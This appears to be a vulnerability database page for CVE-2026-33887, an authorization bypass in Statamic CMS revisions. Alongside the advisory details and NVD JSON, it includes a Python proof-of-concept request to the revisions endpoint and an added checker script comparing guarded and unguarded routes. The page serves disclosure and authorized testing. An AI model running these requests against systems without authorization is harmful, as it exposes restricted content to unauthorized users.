Security Vulnerability Report
CVE-2026-33887 CVSS 5.4 MEDIUM

Published: 2026-03-27 21:17:26
Last Modified: 2026-04-08 13:54:28

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, authenticated Control Panel users could view entry revisions for any collection with revisions enabled, regardless of whether they had the required collection permissions. This bypasses the authorization checks that the main entry controllers enforce, exposing entry field values and blueprint data. Users could also create entry revisions without edit permission, though this only snapshots the existing content state and does not affect published content. This has been fixed in 5.73.16 and 6.7.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE (versions before 5.73.16)
cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE (versions from 6.0.0 up to, but not including, 6.7.2)
Statamic CMS < 5.73.16
Statamic CMS >= 6.0.0, < 6.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept: Unauthorized Revision Access
# Target: Statamic CMS < 5.73.16 / 6.0.0 <= version < 6.7.2
# Description: Accessing revisions of a restricted collection using a low-privileged user.
# Precondition: the session used below must belong to a Control Panel user who does NOT
# hold the view permission for the target collection. If the user may view the collection
# anyway, a 200 response is legitimate access, not the bypass.

import requests


def check_vulnerability(target_url, session_cookie):
    # Identify a valid entry ID and collection handle (reconnaissance required)
    collection_id = "blog"  # Example collection handle
    entry_id = "1"  # Example entry ID

    # Revisions endpoint; in affected versions it skips the collection permission check
    # that the main entry controllers enforce
    url = f"{target_url}/cp/collections/{collection_id}/entries/{entry_id}/revisions"
    headers = {
        # The session cookie name is set per application (Laravel's SESSION_COOKIE); adjust as needed
        "Cookie": f"statamic_session={session_cookie}",
        "User-Agent": "CVE-2026-33887-PoC",
        "Accept": "application/json",
    }

    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Vulnerability Confirmed!")
            print("[+] Successfully accessed unauthorized revisions.")
            print(f"[+] Response Data: {response.text[:200]}")
            return True
        else:
            # 403 means the collection permission was enforced; 401 means the session is not valid
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False


# Usage
# target = "http://localhost:8000"
# cookie = "low_priv_user_session_token"
# check_vulnerability(target, cookie)
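The script below is an added example written for this page; it is not Statamic's code and not the PoC above. It encodes the affected version ranges from the configuration data on this page and turns the single-request PoC into a differential test: the entry route, which the advisory says is guarded by collection permissions, must refuse the test user while the revisions route answers with data. A lone 200 from the revisions route proves nothing when the user is allowed to view the collection anyway. The route paths, the use of 403 for a denied Control Panel request and 401 for a missing session, and the assumption that the revisions index is JSON-decodable are assumptions, not facts from the advisory; the HTTP call is injectable so the verdict logic can be exercised offline with constructed responses.

```python
"""
Added example for CVE-2026-33887 (not Statamic's code, not the page's PoC).

is_affected()  - applies the NVD ranges on this page: < 5.73.16, and 6.0.0 <= v < 6.7.2
classify()     - differential verdict from the guarded entry route and the revisions route
check()        - runs both requests against a target; 'get' is injectable for offline tests

Assumptions (not from the advisory): the two route paths, 403 for a denied CP request,
401 for an unauthenticated JSON request, and a JSON-decodable revisions index.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Tuple

# Affected ranges as [start, end) tuples, taken from the NVD configuration on this page.
AFFECTED_RANGES = (
    ((0, 0, 0), (5, 73, 16)),
    ((6, 0, 0), (6, 7, 2)),
)


def parse_version(version: str) -> Tuple[int, int, int]:
    """'v5.73.15' -> (5, 73, 15); missing components are padded with zeros."""
    parts = [int(p) for p in version.strip().lstrip("v").split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def is_affected(version: str) -> bool:
    """True if the version string falls inside one of the NVD affected ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def looks_like_revisions(body: str) -> bool:
    """Assumption: the revisions index is a JSON list or object."""
    try:
        return isinstance(json.loads(body), (list, dict))
    except ValueError:
        return False


def classify(entry_status: int, revisions_status: int, revisions_body: str) -> str:
    """Combine both responses into a verdict.

    entry_status     - GET /cp/collections/{c}/entries/{e}            (guarded route)
    revisions_status - GET /cp/collections/{c}/entries/{e}/revisions  (route under test)
    """
    if 401 in (entry_status, revisions_status) or 302 in (entry_status, revisions_status):
        return "unauthenticated"   # no usable CP session: nothing can be concluded
    if entry_status == 200:
        return "inconclusive"      # the test user may view this collection legitimately
    if entry_status == 403 and revisions_status == 403:
        return "not-vulnerable"    # both routes enforce the collection permission
    if entry_status == 403 and revisions_status == 200 and looks_like_revisions(revisions_body):
        return "vulnerable"        # guarded route refuses, revisions route still serves data
    return "inconclusive"


def http_get(url: str, cookie_header: str) -> Tuple[int, str]:
    """GET with the CP session cookie; HTTP errors come back as (status, body), not exceptions."""
    req = urllib.request.Request(url, headers={
        "Cookie": cookie_header,  # full "name=value" pair; the cookie name is per application
        "Accept": "application/json",
        "User-Agent": "CVE-2026-33887-check",
    })
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check(base_url: str, cookie_header: str, collection: str, entry: str,
          get: Callable[[str, str], Tuple[int, str]] = http_get) -> str:
    """Request the guarded entry route and the revisions route, then classify."""
    base = base_url.rstrip("/")
    entry_url = f"{base}/cp/collections/{collection}/entries/{entry}"   # assumed path
    revisions_url = f"{entry_url}/revisions"                            # assumed path
    entry_status, _ = get(entry_url, cookie_header)
    revisions_status, body = get(revisions_url, cookie_header)
    return classify(entry_status, revisions_status, body)


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 5:
        sys.exit("usage: check.py BASE_URL 'cookie_name=value' COLLECTION ENTRY_ID")
    print(check(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]))
```

Run it only against an instance you are authorised to test, with a session for a user who has no permissions on the chosen collection; "inconclusive" with an entry status of 200 means the test user is not actually restricted, and the result says nothing about the bypass.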

References

https://github.com/statamic/cms/security/advisories/GHSA-4hp7-3wxg-cv9q (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33887",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-27T21:17:25.647",
    "lastModified": "2026-04-08T13:54:27.513",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, authenticated Control Panel users could view entry revisions for any collection with revisions enabled, regardless of whether they had the required collection permissions. This bypasses the authorization checks that the main entry controllers enforce, exposing entry field values and blueprint data. Users could also create entry revisions without edit permission, though this only snapshots the existing content state and does not affect published content. This has been fixed in 5.73.16 and 6.7.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "5.73.16",
                "matchCriteriaId": "EACDC143-742E-4926-9C28-6095690EB549"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.0.0",
                "versionEndExcluding": "6.7.2",
                "matchCriteriaId": "631FF065-0872-4DC7-AB25-AB74B782A9BE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/statamic/cms/security/advisories/GHSA-4hp7-3wxg-cv9q",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}